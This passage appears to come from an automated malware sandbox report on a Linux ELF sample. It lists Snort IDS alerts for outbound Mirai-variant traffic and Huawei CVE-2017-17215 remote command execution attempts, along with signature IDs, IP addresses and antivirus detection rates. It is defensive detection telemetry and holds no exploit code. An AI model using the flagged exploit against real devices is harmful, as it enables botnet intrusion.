    Source Port:53038
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.211.20643212802839471 02/14/24-09:29:08.609039
    SID:2839471
    Source Port:43212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.181.177.14141392802839471 02/14/24-09:30:25.533404
    SID:2839471
    Source Port:41392
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.216.162.19549292802839471 02/14/24-09:29:25.165000
    SID:2839471
    Source Port:49292
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2341.37.168.25339832372152829579 02/14/24-09:27:59.210683
    SID:2829579
    Source Port:39832
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.176.16435496802839471 02/14/24-09:30:23.035001
    SID:2839471
    Source Port:35496
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.79.9352400802839471 02/14/24-09:29:08.791009
    SID:2839471
    Source Port:52400
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.208.215.21539454802839471 02/14/24-09:28:14.075149
    SID:2839471
    Source Port:39454
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.54.163.17649856802839471 02/14/24-09:29:01.229051
    SID:2839471
    Source Port:49856
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.150.13038964802839471 02/14/24-09:28:16.534972
    SID:2839471
    Source Port:38964
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.218.206.3336796802839471 02/14/24-09:27:46.135641
    SID:2839471
    Source Port:36796
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.246.9750256802839471 02/14/24-09:29:58.688220
    SID:2839471
    Source Port:50256
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.171.232.733260802839471 02/14/24-09:30:12.568138
    SID:2839471
    Source Port:33260
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.48.59.23454852802839471 02/14/24-09:29:12.927921
    SID:2839471
    Source Port:54852
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.128.137.16137494802839471 02/14/24-09:29:18.366180
    SID:2839471
    Source Port:37494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.149.106.3046024802839471 02/14/24-09:28:03.590332
    SID:2839471
    Source Port:46024
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.56.128.8748492802839471 02/14/24-09:29:15.566742
    SID:2839471
    Source Port:48492
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.9.91.656188802839471 02/14/24-09:29:41.037745
    SID:2839471
    Source Port:56188
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.39.2448248802839471 02/14/24-09:28:39.781400
    SID:2839471
    Source Port:48248
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.214.103.17450032372152829579 02/14/24-09:29:39.586861
    SID:2829579
    Source Port:50032
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.243.20046210802839471 02/14/24-09:28:39.751535
    SID:2839471
    Source Port:46210
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2341.37.168.25339832372152835222 02/14/24-09:27:59.210683
    SID:2835222
    Source Port:39832
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.46.1250504802839471 02/14/24-09:28:19.746311
    SID:2839471
    Source Port:50504
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.140.239.10742770802839471 02/14/24-09:28:32.587064
    SID:2839471
    Source Port:42770
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.135.44.10454478802839471 02/14/24-09:30:22.257781
    SID:2839471
    Source Port:54478
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.58.238.12749702802839471 02/14/24-09:28:07.186237
    SID:2839471
    Source Port:49702
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.57.13847026802839471 02/14/24-09:28:37.778893
    SID:2839471
    Source Port:47026
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.124.249.24940568802839471 02/14/24-09:28:45.322585
    SID:2839471
    Source Port:40568
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.197.1.5248894802839471 02/14/24-09:29:48.432648
    SID:2839471
    Source Port:48894
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.168.237.1443142802839471 02/14/24-09:28:16.760945
    SID:2839471
    Source Port:43142
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.249.17241212802839471 02/14/24-09:29:29.855136
    SID:2839471
    Source Port:41212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.74.20760852802839471 02/14/24-09:30:07.441131
    SID:2839471
    Source Port:60852
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.139.7339164802839471 02/14/24-09:29:24.173544
    SID:2839471
    Source Port:39164
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.179.189.4846852802839471 02/14/24-09:29:08.589998
    SID:2839471
    Source Port:46852
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.176.5340406802839471 02/14/24-09:29:23.927209
    SID:2839471
    Source Port:40406
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.51.126.12033586802839471 02/14/24-09:27:59.114628
    SID:2839471
    Source Port:33586
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.67.71.23456348802839471 02/14/24-09:28:29.542062
    SID:2839471
    Source Port:56348
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.164.195.17243370802839471 02/14/24-09:27:55.010400
    SID:2839471
    Source Port:43370
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.125.24459298802839471 02/14/24-09:29:32.528328
    SID:2839471
    Source Port:59298
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.73.3647458802839471 02/14/24-09:30:23.052468
    SID:2839471
    Source Port:47458
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.77.1334366802839471 02/14/24-09:29:04.270458
    SID:2839471
    Source Port:34366
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: uR2hnJKQGC.elfAvira: detected
    Source: uR2hnJKQGC.elfReversingLabs: Detection: 65%
    Source: uR2hnJKQGC.elfVirustotal: Detection: 64%Perma Link

    Networking

    barindex
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38972 -> 112.124.185.183:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58636 -> 95.101.71.205:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49480 -> 95.90.14.22:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37292 -> 95.213.203.34:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36796 -> 88.218.206.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55736 -> 112.78.125.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56268 -> 112.147.179.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44164 -> 112.74.1.222:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52692 -> 112.167.247.4:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55310 -> 88.102.200.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39682 -> 88.84.193.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38712 -> 112.74.74.60:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41540 -> 88.122.72.248:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39586 -> 88.119.160.83:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43370 -> 95.164.195.172:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56740 -> 95.216.94.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43926 -> 95.158.56.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58714 -> 95.163.53.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58912 -> 95.70.156.50:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39832 -> 41.37.168.253:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39832 -> 41.37.168.253:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57264 -> 112.74.204.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49072 -> 112.125.90.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41654 -> 95.100.58.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33588 -> 112.51.126.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57848 -> 95.237.86.251:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49650 -> 95.101.11.76:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33586 -> 112.51.126.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37876 -> 95.57.133.110:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53476 -> 95.175.8.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54296 -> 95.161.184.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43252 -> 95.169.186.215:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50560 -> 95.167.47.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46024 -> 88.149.106.30:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54138 -> 95.210.89.3:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42560 -> 95.111.240.249:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46932 -> 95.100.190.61:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50368 -> 197.49.60.131:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50368 -> 197.49.60.131:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42412 -> 112.221.197.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52802 -> 95.9.78.227:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58686 -> 95.235.214.171:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49702 -> 95.58.238.127:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54690 -> 95.142.165.181:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33032 -> 95.101.215.169:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44880 -> 95.217.6.238:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37936 -> 95.217.180.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39728 -> 95.100.182.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51552 -> 95.0.232.46:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35710 -> 95.59.170.221:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46472 -> 112.173.228.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50640 -> 112.185.223.119:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56774 -> 112.95.139.152:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53996 -> 112.165.90.235:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54018 -> 112.165.90.235:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59664 -> 95.154.252.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58322 -> 95.179.188.239:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51982 -> 88.221.70.228:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39454 -> 88.208.215.215:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45222 -> 88.99.249.254:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34662 -> 88.174.236.233:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37728 -> 88.198.154.135:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38964 -> 95.100.150.130:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50488 -> 95.164.254.54:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38970 -> 95.100.150.130:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43142 -> 95.168.237.14:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35926 -> 88.221.159.82:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44720 -> 88.99.239.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51524 -> 112.196.24.57:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50784 -> 112.31.114.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45432 -> 95.211.206.152:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50504 -> 95.216.46.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36154 -> 95.163.55.179:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42882 -> 95.101.47.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40044 -> 95.217.68.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45446 -> 95.173.180.74:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34418 -> 112.29.198.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42870 -> 112.46.49.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57944 -> 95.179.136.132:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55252 -> 95.217.229.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50294 -> 95.68.115.44:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42878 -> 112.46.49.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47258 -> 95.132.214.95:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56718 -> 88.198.7.16:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55598 -> 88.214.19.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58200 -> 95.217.210.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51602 -> 95.101.6.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53140 -> 95.101.114.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56348 -> 95.67.71.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50692 -> 88.114.193.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40170 -> 95.85.47.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40486 -> 95.100.72.95:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47084 -> 95.216.92.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54100 -> 95.188.70.38:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40512 -> 95.100.72.95:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38270 -> 95.72.216.7:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38552 -> 95.111.216.161:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42770 -> 95.140.239.107:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44112 -> 112.219.58.35:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49062 -> 88.135.68.193:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38604 -> 88.153.80.130:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36698 -> 88.87.90.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47026 -> 88.221.57.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47320 -> 88.208.41.96:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59356 -> 88.164.157.71:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46154 -> 95.101.243.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60824 -> 95.182.78.11:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37456 -> 95.57.5.107:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46210 -> 95.101.243.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36670 -> 95.146.22.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55576 -> 95.100.62.127:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48248 -> 95.217.39.24:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54212 -> 95.57.110.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38920 -> 95.42.21.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47608 -> 95.100.76.235:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44546 -> 95.213.219.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54036 -> 95.58.97.253:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34674 -> 88.218.224.110:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48640 -> 95.217.70.21:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40568 -> 95.124.249.249:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60776 -> 95.101.83.86:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58592 -> 112.13.125.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58594 -> 112.13.125.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51014 -> 95.82.231.190:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36872 -> 88.248.141.228:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58984 -> 88.221.242.63:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39756 -> 112.167.5.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57688 -> 112.153.134.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34286 -> 112.197.68.110:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55838 -> 88.221.204.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50324 -> 88.193.231.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59222 -> 88.99.253.247:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55808 -> 88.170.210.218:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:32944 -> 88.195.136.194:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34142 -> 88.209.228.215:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52268 -> 88.15.81.179:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35164 -> 88.130.182.128:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43920 -> 95.38.75.78:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48104 -> 95.6.13.181:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44648 -> 95.179.188.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50220 -> 112.213.32.148:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34200 -> 112.74.44.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43896 -> 112.74.58.202:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49856 -> 112.54.163.176:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39996 -> 112.48.244.54:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53594 -> 112.125.88.51:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53494 -> 112.74.125.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45874 -> 95.100.233.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42024 -> 95.100.211.27:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36028 -> 95.215.240.136:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34366 -> 95.86.77.13:80
